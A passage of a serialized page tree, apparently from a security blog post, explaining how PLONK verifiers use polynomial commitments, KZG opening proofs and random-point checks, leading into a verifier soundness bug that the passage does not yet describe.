e":26,"tag":137,"props":1424,"children":1426},{"className":1425},[169,170],[1427],{"type":32,"value":1334},{"type":26,"tag":137,"props":1429,"children":1431},{"className":1430},[236],[1432],{"type":26,"tag":137,"props":1433,"children":1435},{"className":1434},[241,417],[1436,1465],{"type":26,"tag":137,"props":1437,"children":1439},{"className":1438},[246],[1440,1460],{"type":26,"tag":137,"props":1441,"children":1443},{"className":1442,"style":815},[251],[1444],{"type":26,"tag":137,"props":1445,"children":1446},{"style":430},[1447,1451],{"type":26,"tag":137,"props":1448,"children":1450},{"className":1449,"style":262},[261],[],{"type":26,"tag":137,"props":1452,"children":1454},{"className":1453},[267,268,269,270],[1455],{"type":26,"tag":137,"props":1456,"children":1458},{"className":1457},[169,170,270],[1459],{"type":32,"value":942},{"type":26,"tag":137,"props":1461,"children":1463},{"className":1462},[453],[1464],{"type":32,"value":456},{"type":26,"tag":137,"props":1466,"children":1468},{"className":1467},[246],[1469],{"type":26,"tag":137,"props":1470,"children":1472},{"className":1471,"style":464},[251],[1473],{"type":26,"tag":137,"props":1474,"children":1475},{},[],{"type":26,"tag":137,"props":1477,"children":1479},{"className":1478},[162],[1480],{"type":32,"value":165},{"type":26,"tag":137,"props":1482,"children":1484},{"className":1483},[169,170],[1485],{"type":32,"value":173},{"type":26,"tag":137,"props":1487,"children":1489},{"className":1488},[197],[1490],{"type":32,"value":200},{"type":32,"value":1492},", etc., all interpolated over a domain ",{"type":26,"tag":130,"props":1494,"children":1496},{"className":1495},[133,134],[1497],{"type":26,"tag":137,"props":1498,"children":1500},{"className":1499},[140],[1501],{"type":26,"tag":137,"props":1502,"children":1504},{"className":1503,"ariaHidden":146},[145],[1505],{"type":26,"tag":137,"props":1506,"children":1508},{"className":1507},[151],[1509,1514],{"type":26,"tag":137,"props":1510,"children":1513},{"className":1511,"style":1512},[156],"height:0.6833em;",[],{"type":26,"tag":137,"props":1515,"children":1518},{"className":1516,"style":1517},[169,170],"margin-right:0.08125em;",[1519],{"type":32,"value":1520},"H",{"type":32,"value":1522}," of ",{"type":26,"tag":130,"props":1524,"children":1526},{"className":1525},[133,134],[1527],{"type":26,"tag":137,"props":1528,"children":1530},{"className":1529},[140],[1531],{"type":26,"tag":137,"props":1532,"children":1534},{"className":1533,"ariaHidden":146},[145],[1535],{"type":26,"tag":137,"props":1536,"children":1538},{"className":1537},[151],[1539,1544],{"type":26,"tag":137,"props":1540,"children":1543},{"className":1541,"style":1542},[156],"height:0.4306em;",[],{"type":26,"tag":137,"props":1545,"children":1547},{"className":1546},[169,170],[1548],{"type":32,"value":1549},"n",{"type":32,"value":1551},"-th roots of unity. Evaluating ",{"type":26,"tag":130,"props":1553,"children":1555},{"className":1554},[133,134],[1556],{"type":26,"tag":137,"props":1557,"children":1559},{"className":1558},[140],[1560],{"type":26,"tag":137,"props":1561,"children":1563},{"className":1562,"ariaHidden":146},[145],[1564],{"type":26,"tag":137,"props":1565,"children":1567},{"className":1566},[151],[1568,1572,1629,1634,1639],{"type":26,"tag":137,"props":1569,"children":1571},{"className":1570,"style":157},[156],[],{"type":26,"tag":137,"props":1573,"children":1575},{"className":1574},[169],[1576,1581],{"type":26,"tag":137,"props":1577,"children":1579},{"className":1578,"style":1039},[169,170],[1580],{"type":32,"value":1042},{"type":26,"tag":137,"props":1582,"children":1584},{"className":1583},[236],[1585],{"type":26,"tag":137,"props":1586,"children":1588},{"className":1587},[241,417],[1589,1618],{"type":26,"tag":137,"props":1590,"children":1592},{"className":1591},[246],[1593,1613],{"type":26,"tag":137,"props":1594,"children":1596},{"className":1595,"style":815},[251],[1597],{"type":26,"tag":137,"props":1598,"children":1599},{"style":1061},[1600,1604],{"type":26,"tag":137,"props":1601,"children":1603},{"className":1602,"style":262},[261],[],{"type":26,"tag":137,"props":1605,"children":1607},{"className":1606},[267,268,269,270],[1608],{"type":26,"tag":137,"props":1609,"children":1611},{"className":1610},[169,170,270],[1612],{"type":32,"value":942},{"type":26,"tag":137,"props":1614,"children":1616},{"className":1615},[453],[1617],{"type":32,"value":456},{"type":26,"tag":137,"props":1619,"children":1621},{"className":1620},[246],[1622],{"type":26,"tag":137,"props":1623,"children":1625},{"className":1624,"style":464},[251],[1626],{"type":26,"tag":137,"props":1627,"children":1628},{},[],{"type":26,"tag":137,"props":1630,"children":1632},{"className":1631},[162],[1633],{"type":32,"value":165},{"type":26,"tag":137,"props":1635,"children":1637},{"className":1636},[169,170],[1638],{"type":32,"value":173},{"type":26,"tag":137,"props":1640,"children":1642},{"className":1641},[197],[1643],{"type":32,"value":200},{"type":32,"value":1645}," at the ",{"type":26,"tag":130,"props":1647,"children":1649},{"className":1648},[133,134],[1650],{"type":26,"tag":137,"props":1651,"children":1653},{"className":1652},[140],[1654],{"type":26,"tag":137,"props":1655,"children":1657},{"className":1656,"ariaHidden":146},[145],[1658],{"type":26,"tag":137,"props":1659,"children":1661},{"className":1660},[151],[1662,1666],{"type":26,"tag":137,"props":1663,"children":1665},{"className":1664,"style":499},[156],[],{"type":26,"tag":137,"props":1667,"children":1669},{"className":1668},[169,170],[1670],{"type":32,"value":506},{"type":32,"value":1672},"-th root recovers the left wire value at row ",{"type":26,"tag":130,"props":1674,"children":1676},{"className":1675},[133,134],[1677],{"type":26,"tag":137,"props":1678,"children":1680},{"className":1679},[140],[1681],{"type":26,"tag":137,"props":1682,"children":1684},{"className":1683,"ariaHidden":146},[145],[1685],{"type":26,"tag":137,"props":1686,"children":1688},{"className":1687},[151],[1689,1693],{"type":26,"tag":137,"props":1690,"children":1692},{"className":1691,"style":499},[156],[],{"type":26,"tag":137,"props":1694,"children":1696},{"className":1695},[169,170],[1697],{"type":32,"value":506},{"type":32,"value":470},{"type":26,"tag":1700,"props":1701,"children":1702},"polynomial-interpolation-panel",{},[],{"type":26,"tag":35,"props":1704,"children":1705},{},[1706,1708,1749,1751,1818,1820,1953,1955,1995,1997,2037,2039,2080,2082,2205],{"type":32,"value":1707},"Because all columns are now polynomials, the entire circuit compresses into a single master constraint polynomial ",{"type":26,"tag":130,"props":1709,"children":1711},{"className":1710},[133,134],[1712],{"type":26,"tag":137,"props":1713,"children":1715},{"className":1714},[140],[1716],{"type":26,"tag":137,"props":1717,"children":1719},{"className":1718,"ariaHidden":146},[145],[1720],{"type":26,"tag":137,"props":1721,"children":1723},{"className":1722},[151],[1724,1728,1734,1739,1744],{"type":26,"tag":137,"props":1725,"children":1727},{"className":1726,"style":157},[156],[],{"type":26,"tag":137,"props":1729,"children":1732},{"className":1730,"style":1731},[169,170],"margin-right:0.13889em;",[1733],{"type":32,"value":409},{"type":26,"tag":137,"props":1735,"children":1737},{"className":1736},[162],[1738],{"type":32,"value":165},{"type":26,"tag":137,"props":1740,"children":1742},{"className":1741},[169,170],[1743],{"type":32,"value":173},{"type":26,"tag":137,"props":1745,"children":1747},{"className":1746},[197],[1748],{"type":32,"value":200},{"type":32,"value":1750}," that combines selectors and witnesses. If the prover was honest, ",{"type":26,"tag":130,"props":1752,"children":1754},{"className":1753},[133,134],[1755],{"type":26,"tag":137,"props":1756,"children":1758},{"className":1757},[140],[1759],{"type":26,"tag":137,"props":1760,"children":1762},{"className":1761,"ariaHidden":146},[145],[1763,1804],{"type":26,"tag":137,"props":1764,"children":1766},{"className":1765},[151],[1767,1771,1776,1781,1786,1791,1795,1800],{"type":26,"tag":137,"props":1768,"children":1770},{"className":1769,"style":157},[156],[],{"type":26,"tag":137,"props":1772,"children":1774},{"className":1773,"style":1731},[169,170],[1775],{"type":32,"value":409},{"type":26,"tag":137,"props":1777,"children":1779},{"className":1778},[162],[1780],{"type":32,"value":165},{"type":26,"tag":137,"props":1782,"children":1784},{"className":1783},[169,170],[1785],{"type":32,"value":173},{"type":26,"tag":137,"props":1787,"children":1789},{"className":1788},[197],[1790],{"type":32,"value":200},{"type":26,"tag":137,"props":1792,"children":1794},{"className":1793,"style":281},[184],[],{"type":26,"tag":137,"props":1796,"children":1798},{"className":1797},[286],[1799],{"type":32,"value":289},{"type":26,"tag":137,"props":1801,"children":1803},{"className":1802,"style":281},[184],[],{"type":26,"tag":137,"props":1805,"children":1807},{"className":1806},[151],[1808,1812],{"type":26,"tag":137,"props":1809,"children":1811},{"className":1810,"style":368},[156],[],{"type":26,"tag":137,"props":1813,"children":1815},{"className":1814},[169],[1816],{"type":32,"value":1817},"0",{"type":32,"value":1819}," at every row index in the domain. The vanishing polynomial ",{"type":26,"tag":130,"props":1821,"children":1823},{"className":1822},[133,134],[1824],{"type":26,"tag":137,"props":1825,"children":1827},{"className":1826},[140],[1828],{"type":26,"tag":137,"props":1829,"children":1831},{"className":1830,"ariaHidden":146},[145],[1832,1875,1940],{"type":26,"tag":137,"props":1833,"children":1835},{"className":1834},[151],[1836,1840,1847,1852,1857,1862,1866,1871],{"type":26,"tag":137,"props":1837,"children":1839},{"className":1838,"style":157},[156],[],{"type":26,"tag":137,"props":1841,"children":1844},{"className":1842,"style":1843},[169,170],"margin-right:0.07153em;",[1845],{"type":32,"value":1846},"Z",{"type":26,"tag":137,"props":1848,"children":1850},{"className":1849},[162],[1851],{"type":32,"value":165},{"type":26,"tag":137,"props":1853,"children":1855},{"className":1854},[169,170],[1856],{"type":32,"value":173},{"type":26,"tag":137,"props":1858,"children":1860},{"className":1859},[197],[1861],{"type":32,"value":200},{"type":26,"tag":137,"props":1863,"children":1865},{"className":1864,"style":281},[184],[],{"type":26,"tag":137,"props":1867,"children":1869},{"className":1868},[286],[1870],{"type":32,"value":289},{"type":26,"tag":137,"props":1872,"children":1874},{"className":1873,"style":281},[184],[],{"type":26,"tag":137,"props":1876,"children":1878},{"className":1877},[151],[1879,1884,1926,1930,1936],{"type":26,"tag":137,"props":1880,"children":1883},{"className":1881,"style":1882},[156],"height:0.7477em;vertical-align:-0.0833em;",[],{"type":26,"tag":137,"props":1885,"children":1887},{"className":1886},[169],[1888,1893],{"type":26,"tag":137,"props":1889,"children":1891},{"className":1890},[169,170],[1892],{"type":32,"value":173},{"type":26,"tag":137,"props":1894,"children":1896},{"className":1895},[236],[1897],{"type":26,"tag":137,"props":1898,"children":1900},{"className":1899},[241],[1901],{"type":26,"tag":137,"props":1902,"children":1904},{"className":1903},[246],[1905],{"type":26,"tag":137,"props":1906,"children":1909},{"className":1907,"style":1908},[251],"height:0.6644em;",[1910],{"type":26,"tag":137,"props":1911,"children":1912},{"style":256},[1913,1917],{"type":26,"tag":137,"props":1914,"children":1916},{"className":1915,"style":262},[261],[],{"type":26,"tag":137,"props":1918,"children":1920},{"className":1919},[267,268,269,270],[1921],{"type":26,"tag":137,"props":1922,"children":1924},{"className":1923},[169,170,270],[1925],{"type":32,"value":1549},{"type":26,"tag":137,"props":1927,"children":1929},{"className":1928,"style":348},[184],[],{"type":26,"tag":137,"props":1931,"children":1933},{"className":1932},[353],[1934],{"type":32,"value":1935},"−",{"type":26,"tag":137,"props":1937,"children":1939},{"className":1938,"style":348},[184],[],{"type":26,"tag":137,"props":1941,"children":1943},{"className":1942},[151],[1944,1948],{"type":26,"tag":137,"props":1945,"children":1947},{"className":1946,"style":368},[156],[],{"type":26,"tag":137,"props":1949,"children":1951},{"className":1950},[169],[1952],{"type":32,"value":878},{"type":32,"value":1954}," is zero on exactly those points, so if all constraints hold then ",{"type":26,"tag":130,"props":1956,"children":1958},{"className":1957},[133,134],[1959],{"type":26,"tag":137,"props":1960,"children":1962},{"className":1961},[140],[1963],{"type":26,"tag":137,"props":1964,"children":1966},{"className":1965,"ariaHidden":146},[145],[1967],{"type":26,"tag":137,"props":1968,"children":1970},{"className":1969},[151],[1971,1975,1980,1985,1990],{"type":26,"tag":137,"props":1972,"children":1974},{"className":1973,"style":157},[156],[],{"type":26,"tag":137,"props":1976,"children":1978},{"className":1977,"style":1843},[169,170],[1979],{"type":32,"value":1846},{"type":26,"tag":137,"props":1981,"children":1983},{"className":1982},[162],[1984],{"type":32,"value":165},{"type":26,"tag":137,"props":1986,"children":1988},{"className":1987},[169,170],[1989],{"type":32,"value":173},{"type":26,"tag":137,"props":1991,"children":1993},{"className":1992},[197],[1994],{"type":32,"value":200},{"type":32,"value":1996}," divides ",{"type":26,"tag":130,"props":1998,"children":2000},{"className":1999},[133,134],[2001],{"type":26,"tag":137,"props":2002,"children":2004},{"className":2003},[140],[2005],{"type":26,"tag":137,"props":2006,"children":2008},{"className":2007,"ariaHidden":146},[145],[2009],{"type":26,"tag":137,"props":2010,"children":2012},{"className":2011},[151],[2013,2017,2022,2027,2032],{"type":26,"tag":137,"props":2014,"children":2016},{"className":2015,"style":157},[156],[],{"type":26,"tag":137,"props":2018,"children":2020},{"className":2019,"style":1731},[169,170],[2021],{"type":32,"value":409},{"type":26,"tag":137,"props":2023,"children":2025},{"className":2024},[162],[2026],{"type":32,"value":165},{"type":26,"tag":137,"props":2028,"children":2030},{"className":2029},[169,170],[2031],{"type":32,"value":173},{"type":26,"tag":137,"props":2033,"children":2035},{"className":2034},[197],[2036],{"type":32,"value":200},{"type":32,"value":2038},", yielding a quotient polynomial ",{"type":26,"tag":130,"props":2040,"children":2042},{"className":2041},[133,134],[2043],{"type":26,"tag":137,"props":2044,"children":2046},{"className":2045},[140],[2047],{"type":26,"tag":137,"props":2048,"children":2050},{"className":2049,"ariaHidden":146},[145],[2051],{"type":26,"tag":137,"props":2052,"children":2054},{"className":2053},[151],[2055,2059,2065,2070,2075],{"type":26,"tag":137,"props":2056,"children":2058},{"className":2057,"style":157},[156],[],{"type":26,"tag":137,"props":2060,"children":2062},{"className":2061,"style":1731},[169,170],[2063],{"type":32,"value":2064},"T",{"type":26,"tag":137,"props":2066,"children":2068},{"className":2067},[162],[2069],{"type":32,"value":165},{"type":26,"tag":137,"props":2071,"children":2073},{"className":2072},[169,170],[2074],{"type":32,"value":173},{"type":26,"tag":137,"props":2076,"children":2078},{"className":2077},[197],[2079],{"type":32,"value":200},{"type":32,"value":2081}," with ",{"type":26,"tag":130,"props":2083,"children":2085},{"className":2084},[133,134],[2086],{"type":26,"tag":137,"props":2087,"children":2089},{"className":2088},[140],[2090],{"type":26,"tag":137,"props":2091,"children":2093},{"className":2092,"ariaHidden":146},[145],[2094,2135,2177],{"type":26,"tag":137,"props":2095,"children":2097},{"className":2096},[151],[2098,2102,2107,2112,2117,2122,2126,2131],{"type":26,"tag":137,"props":2099,"children":2101},{"className":2100,"style":157},[156],[],{"type":26,"tag":137,"props":2103,"children":2105},{"className":2104,"style":1731},[169,170],[2106],{"type":32,"value":409},{"type":26,"tag":137,"props":2108,"children":2110},{"className":2109},[162],[2111],{"type":32,"value":165},{"type":26,"tag":137,"props":2113,"children":2115},{"className":2114},[169,170],[2116],{"type":32,"value":173},{"type":26,"tag":137,"props":2118,"children":2120},{"className":2119},[197],[2121],{"type":32,"value":200},{"type":26,"tag":137,"props":2123,"children":2125},{"className":2124,"style":281},[184],[],{"type":26,"tag":137,"props":2127,"children":2129},{"className":2128},[286],[2130],{"type":32,"value":289},{"type":26,"tag":137,"props":2132,"children":2134},{"className":2133,"style":281},[184],[],{"type":26,"tag":137,"props":2136,"children":2138},{"className":2137},[151],[2139,2143,2148,2153,2158,2163,2167,2173],{"type":26,"tag":137,"props":2140,"children":2142},{"className":2141,"style":157},[156],[],{"type":26,"tag":137,"props":2144,"children":2146},{"className":2145,"style":1731},[169,170],[2147],{"type":32,"value":2064},{"type":26,"tag":137,"props":2149,"children":2151},{"className":2150},[162],[2152],{"type":32,"value":165},{"type":26,"tag":137,"props":2154,"children":2156},{"className":2155},[169,170],[2157],{"type":32,"value":173},{"type":26,"tag":137,"props":2159,"children":2161},{"className":2160},[197],[2162],{"type":32,"value":200},{"type":26,"tag":137,"props":2164,"children":2166},{"className":2165,"style":348},[184],[],{"type":26,"tag":137,"props":2168,"children":2170},{"className":2169},[353],[2171],{"type":32,"value":2172},"⋅",{"type":26,"tag":137,"props":2174,"children":2176},{"className":2175,"style":348},[184],[],{"type":26,"tag":137,"props":2178,"children":2180},{"className":2179},[151],[2181,2185,2190,2195,2200],{"type":26,"tag":137,"props":2182,"children":2184},{"className":2183,"style":157},[156],[],{"type":26,"tag":137,"props":2186,"children":2188},{"className":2187,"style":1843},[169,170],[2189],{"type":32,"value":1846},{"type":26,"tag":137,"props":2191,"children":2193},{"className":2192},[162],[2194],{"type":32,"value":165},{"type":26,"tag":137,"props":2196,"children":2198},{"className":2197},[169,170],[2199],{"type":32,"value":173},{"type":26,"tag":137,"props":2201,"children":2203},{"className":2202},[197],[2204],{"type":32,"value":200},{"type":32,"value":470},{"type":26,"tag":35,"props":2207,"children":2208},{},[2209],{"type":26,"tag":2210,"props":2211,"children":2214},"img",{"alt":2212,"src":2213},"master_equation","/posts/dusk-commitment-issues/master_equation.svg",[],{"type":26,"tag":118,"props":2216,"children":2218},{"id":2217},"polynomial-commitments-and-opening-proofs",[2219],{"type":32,"value":2220},"Polynomial commitments and opening proofs",{"type":26,"tag":35,"props":2222,"children":2223},{},[2224,2226,2231,2233,2238],{"type":32,"value":2225},"To keep the proof short, the prover doesn't send polynomials directly. Instead, it sends ",{"type":26,"tag":762,"props":2227,"children":2228},{},[2229],{"type":32,"value":2230},"commitments",{"type":32,"value":2232},", short cryptographic fingerprints of each polynomial (using e.g. KZG commitments). When the verifier needs the value of a committed polynomial at a specific point, the prover provides the value along with an ",{"type":26,"tag":762,"props":2234,"children":2235},{},[2236],{"type":32,"value":2237},"opening proof",{"type":32,"value":2239}," that the claimed value is consistent with the earlier commitment.",{"type":26,"tag":35,"props":2241,"children":2242},{},[2243],{"type":32,"value":2244},"A committed polynomial evaluation is therefore cryptographically bound, and the prover cannot lie about the value without being caught.",{"type":26,"tag":118,"props":2246,"children":2248},{"id":2247},"reducing-to-a-single-random-point",[2249],{"type":32,"value":2250},"Reducing to a single random point",{"type":26,"tag":35,"props":2252,"children":2253},{},[2254,2256,2296,2298,2325,2327,2449,2451,2476],{"type":32,"value":2255},"After the prover commits to all polynomials, including ",{"type":26,"tag":130,"props":2257,"children":2259},{"className":2258},[133,134],[2260],{"type":26,"tag":137,"props":2261,"children":2263},{"className":2262},[140],[2264],{"type":26,"tag":137,"props":2265,"children":2267},{"className":2266,"ariaHidden":146},[145],[2268],{"type":26,"tag":137,"props":2269,"children":2271},{"className":2270},[151],[2272,2276,2281,2286,2291],{"type":26,"tag":137,"props":2273,"children":2275},{"className":2274,"style":157},[156],[],{"type":26,"tag":137,"props":2277,"children":2279},{"className":2278,"style":1731},[169,170],[2280],{"type":32,"value":2064},{"type":26,"tag":137,"props":2282,"children":2284},{"className":2283},[162],[2285],{"type":32,"value":165},{"type":26,"tag":137,"props":2287,"children":2289},{"className":2288},[169,170],[2290],{"type":32,"value":173},{"type":26,"tag":137,"props":2292,"children":2294},{"className":2293},[197],[2295],{"type":32,"value":200},{"type":32,"value":2297},", the verifier picks a random challenge point ",{"type":26,"tag":130,"props":2299,"children":2301},{"className":2300},[133,134],[2302],{"type":26,"tag":137,"props":2303,"children":2305},{"className":2304},[140],[2306],{"type":26,"tag":137,"props":2307,"children":2309},{"className":2308,"ariaHidden":146},[145],[2310],{"type":26,"tag":137,"props":2311,"children":2313},{"className":2312},[151],[2314,2318],{"type":26,"tag":137,"props":2315,"children":2317},{"className":2316,"style":1542},[156],[],{"type":26,"tag":137,"props":2319,"children":2322},{"className":2320,"style":2321},[169,170],"margin-right:0.04398em;",[2323],{"type":32,"value":2324},"z",{"type":32,"value":2326}," (derived via the Fiat-Shamir heuristic from the transcript) and checks ",{"type":26,"tag":130,"props":2328,"children":2330},{"className":2329},[133,134],[2331],{"type":26,"tag":137,"props":2332,"children":2334},{"className":2333},[140],[2335],{"type":26,"tag":137,"props":2336,"children":2338},{"className":2337,"ariaHidden":146},[145],[2339,2380,2421],{"type":26,"tag":137,"props":2340,"children":2342},{"className":2341},[151],[2343,2347,2352,2357,2362,2367,2371,2376],{"type":26,"tag":137,"props":2344,"children":2346},{"className":2345,"style":157},[156],[],{"type":26,"tag":137,"props":2348,"children":2350},{"className":2349,"style":1731},[169,170],[2351],{"type":32,"value":409},{"type":26,"tag":137,"props":2353,"children":2355},{"className":2354},[162],[2356],{"type":32,"value":165},{"type":26,"tag":137,"props":2358,"children":2360},{"className":2359,"style":2321},[169,170],[2361],{"type":32,"value":2324},{"type":26,"tag":137,"props":2363,"children":2365},{"className":2364},[197],[2366],{"type":32,"value":200},{"type":26,"tag":137,"props":2368,"children":2370},{"className":2369,"style":281},[184],[],{"type":26,"tag":137,"props":2372,"children":2374},{"className":2373},[286],[2375],{"type":32,"value":289},{"type":26,"tag":137,"props":2377,"children":2379},{"className":2378,"style":281},[184],[],{"type":26,"tag":137,"props":2381,"children":2383},{"className":2382},[151],[2384,2388,2393,2398,2403,2408,2412,2417],{"type":26,"tag":137,"props":2385,"children":2387},{"className":2386,"style":157},[156],[],{"type":26,"tag":137,"props":2389,"children":2391},{"className":2390,"style":1731},[169,170],[2392],{"type":32,"value":2064},{"type":26,"tag":137,"props":2394,"children":2396},{"className":2395},[162],[2397],{"type":32,"value":165},{"type":26,"tag":137,"props":2399,"children":2401},{"className":2400,"style":2321},[169,170],[2402],{"type":32,"value":2324},{"type":26,"tag":137,"props":2404,"children":2406},{"className":2405},[197],[2407],{"type":32,"value":200},{"type":26,"tag":137,"props":2409,"children":2411},{"className":2410,"style":348},[184],[],{"type":26,"tag":137,"props":2413,"children":2415},{"className":2414},[353],[2416],{"type":32,"value":2172},{"type":26,"tag":137,"props":2418,"children":2420},{"className":2419,"style":348},[184],[],{"type":26,"tag":137,"props":2422,"children":2424},{"className":2423},[151],[2425,2429,2434,2439,2444],{"type":26,"tag":137,"props":2426,"children":2428},{"className":2427,"style":157},[156],[],{"type":26,"tag":137,"props":2430,"children":2432},{"className":2431,"style":1843},[169,170],[2433],{"type":32,"value":1846},{"type":26,"tag":137,"props":2435,"children":2437},{"className":2436},[162],[2438],{"type":32,"value":165},{"type":26,"tag":137,"props":2440,"children":2442},{"className":2441,"style":2321},[169,170],[2443],{"type":32,"value":2324},{"type":26,"tag":137,"props":2445,"children":2447},{"className":2446},[197],[2448],{"type":32,"value":200},{"type":32,"value":2450}," at that single point. By the Schwartz-Zippel lemma, if this holds at a random ",{"type":26,"tag":130,"props":2452,"children":2454},{"className":2453},[133,134],[2455],{"type":26,"tag":137,"props":2456,"children":2458},{"className":2457},[140],[2459],{"type":26,"tag":137,"props":2460,"children":2462},{"className":2461,"ariaHidden":146},[145],[2463],{"type":26,"tag":137,"props":2464,"children":2466},{"className":2465},[151],[2467,2471],{"type":26,"tag":137,"props":2468,"children":2470},{"className":2469,"style":1542},[156],[],{"type":26,"tag":137,"props":2472,"children":2474},{"className":2473,"style":2321},[169,170],[2475],{"type":32,"value":2324},{"type":32,"value":2477}," then the full polynomial identity holds with overwhelming probability, so the verifier checks the entire multi-million-row circuit in constant time.",{"type":26,"tag":35,"props":2479,"children":2480},{},[2481,2483,2508,2510,2515],{"type":32,"value":2482},"In textbook PLONK the selector polynomials are part of the fixed circuit description, but in practice implementations commit to them during preprocessing and place those commitments in the verifier key. When the verifier later needs their values at ",{"type":26,"tag":130,"props":2484,"children":2486},{"className":2485},[133,134],[2487],{"type":26,"tag":137,"props":2488,"children":2490},{"className":2489},[140],[2491],{"type":26,"tag":137,"props":2492,"children":2494},{"className":2493,"ariaHidden":146},[145],[2495],{"type":26,"tag":137,"props":2496,"children":2498},{"className":2497},[151],[2499,2503],{"type":26,"tag":137,"props":2500,"children":2502},{"className":2501,"style":1542},[156],[],{"type":26,"tag":137,"props":2504,"children":2506},{"className":2505,"style":2321},[169,170],[2507],{"type":32,"value":2324},{"type":32,"value":2509},", the prover supplies ",{"type":26,"tag":762,"props":2511,"children":2512},{},[2513],{"type":32,"value":2514},"evaluation claims",{"type":32,"value":2516}," that must be checked against those commitments with opening proofs.",{"type":26,"tag":35,"props":2518,"children":2519},{},[2520,2522,2527],{"type":32,"value":2521},"The security argument depends on a chain: commitments lock the prover into polynomials ",{"type":26,"tag":762,"props":2523,"children":2524},{},[2525],{"type":32,"value":2526},"before",{"type":32,"value":2528}," challenges are derived, and opening proofs ensure the evaluations are consistent with those commitments. Breaking any single link in this chain collapses soundness entirely.",{"type":26,"tag":118,"props":2530,"children":2532},{"id":2531},"what-the-verifier-is-actually-allowed-to-trust",[2533],{"type":32,"value":2534},"What the verifier is actually allowed to trust",{"type":26,"tag":35,"props":2536,"children":2537},{},[2538,2540,2545],{"type":32,"value":2539},"For this bug, one invariant matters more than the rest: ",{"type":26,"tag":84,"props":2541,"children":2542},{},[2543],{"type":32,"value":2544},"every scalar that enters the final verifier equation must be either locally computed by the verifier, or cryptographically tied to an earlier commitment",{"type":32,"value":470},{"type":26,"tag":35,"props":2547,"children":2548},{},[2549,2551,2644,2645,2737,2739,2764,2766,2806,2807,2848,2849,2942,2943,2989,2991,3080,3081,3168,3169,3257],{"type":32,"value":2550},"In practice, values entering the verifier equation fall into three buckets. The verifier computes some values locally from public data (",{"type":26,"tag":130,"props":2552,"children":2554},{"className":2553},[133,134],[2555],{"type":26,"tag":137,"props":2556,"children":2558},{"className":2557},[140],[2559],{"type":26,"tag":137,"props":2560,"children":2562},{"className":2561,"ariaHidden":146},[145],[2563],{"type":26,"tag":137,"props":2564,"children":2566},{"className":2565},[151],[2567,2571,2629,2634,2639],{"type":26,"tag":137,"props":2568,"children":2570},{"className":2569,"style":157},[156],[],{"type":26,"tag":137,"props":2572,"children":2574},{"className":2573},[169],[2575,2580],{"type":26,"tag":137,"props":2576,"children":2578},{"className":2577,"style":1843},[169,170],[2579],{"type":32,"value":1846},{"type":26,"tag":137,"props":2581,"children":2583},{"className":2582},[236],[2584],{"type":26,"tag":137,"props":2585,"children":2587},{"className":2586},[241,417],[2588,2618],{"type":26,"tag":137,"props":2589,"children":2591},{"className":2590},[246],[2592,2613],{"type":26,"tag":137,"props":2593,"children":2595},{"className":2594,"style":815},[251],[2596],{"type":26,"tag":137,"props":2597,"children":2599},{"style":2598},"top:-2.55em;margin-left:-0.0715em;margin-right:0.05em;",[2600,2604],{"type":26,"tag":137,"props":2601,"children":2603},{"className":2602,"style":262},[261],[],{"type":26,"tag":137,"props":2605,"children":2607},{"className":2606},[267,268,269,270],[2608],{"type":26,"tag":137,"props":2609,"children":2611},{"className":2610,"style":1517},[169,170,270],[2612],{"type":32,"value":1520},{"type":26,"tag":137,"props":2614,"children":2616},{"className":2615},[453],[2617],{"type":32,"value":456},{"type":26,"tag":137,"props":2619,"children":2621},{"className":2620},[246],[2622],{"type":26,"tag":137,"props":2623,"children":2625},{"className":2624,"style":464},[251],[2626],{"type":26,"tag":137,"props":2627,"children":2628},{},[],{"type":26,"tag":137,"props":2630,"children":2632},{"className":2631},[162],[2633],{"type":32,"value":165},{"type":26,"tag":137,"props":2635,"children":2637},{"className":2636,"style":2321},[169,170],[2638],{"type":32,"value":2324},{"type":26,"tag":137,"props":2640,"children":2642},{"className":2641},[197],[2643],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":2646,"children":2648},{"className":2647},[133,134],[2649],{"type":26,"tag":137,"props":2650,"children":2652},{"className":2651},[140],[2653],{"type":26,"tag":137,"props":2654,"children":2656},{"className":2655,"ariaHidden":146},[145],[2657],{"type":26,"tag":137,"props":2658,"children":2660},{"className":2659},[151],[2661,2665,2722,2727,2732],{"type":26,"tag":137,"props":2662,"children":2664},{"className":2663,"style":157},[156],[],{"type":26,"tag":137,"props":2666,"children":2668},{"className":2667},[169],[2669,2674],{"type":26,"tag":137,"props":2670,"children":2672},{"className":2671},[169,170],[2673],{"type":32,"value":942},{"type":26,"tag":137,"props":2675,"children":2677},{"className":2676},[236],[2678],{"type":26,"tag":137,"props":2679,"children":2681},{"className":2680},[241,417],[2682,2711],{"type":26,"tag":137,"props":2683,"children":2685},{"className":2684},[246],[2686,2706],{"type":26,"tag":137,"props":2687,"children":2689},{"className":2688,"style":426},[251],[2690],{"type":26,"tag":137,"props":2691,"children":2692},{"style":430},[2693,2697],{"type":26,"tag":137,"props":2694,"children":2696},{"className":2695,"style":262},[261],[],{"type":26,"tag":137,"props":2698,"children":2700},{"className":2699},[267,268,269,270],[2701],{"type":26,"tag":137,"props":2702,"children":2704},{"className":2703},[169,270],[2705],{"type":32,"value":878},{"type":26,"tag":137,"props":2707,"children":2709},{"className":2708},[453],[2710],{"type":32,"value":456},{"type":26,"tag":137,"props":2712,"children":2714},{"className":2713},[246],[2715],{"type":26,"tag":137,"props":2716,"children":2718},{"className":2717,"style":464},[251],[2719],{"type":26,"tag":137,"props":2720,"children":2721},{},[],{"type":26,"tag":137,"props":2723,"children":2725},{"className":2724},[162],[2726],{"type":32,"value":165},{"type":26,"tag":137,"props":2728,"children":2730},{"className":2729,"style":2321},[169,170],[2731],{"type":32,"value":2324},{"type":26,"tag":137,"props":2733,"children":2735},{"className":2734},[197],[2736],{"type":32,"value":200},{"type":32,"value":2738},", the public-input polynomial at ",{"type":26,"tag":130,"props":2740,"children":2742},{"className":2741},[133,134],[2743],{"type":26,"tag":137,"props":2744,"children":2746},{"className":2745},[140],[2747],{"type":26,"tag":137,"props":2748,"children":2750},{"className":2749,"ariaHidden":146},[145],[2751],{"type":26,"tag":137,"props":2752,"children":2754},{"className":2753},[151],[2755,2759],{"type":26,"tag":137,"props":2756,"children":2758},{"className":2757,"style":1542},[156],[],{"type":26,"tag":137,"props":2760,"children":2762},{"className":2761,"style":2321},[169,170],[2763],{"type":32,"value":2324},{"type":32,"value":2765},"), which are safe because the prover never chooses them. Other values are prover-supplied evaluations accompanied by KZG opening proofs 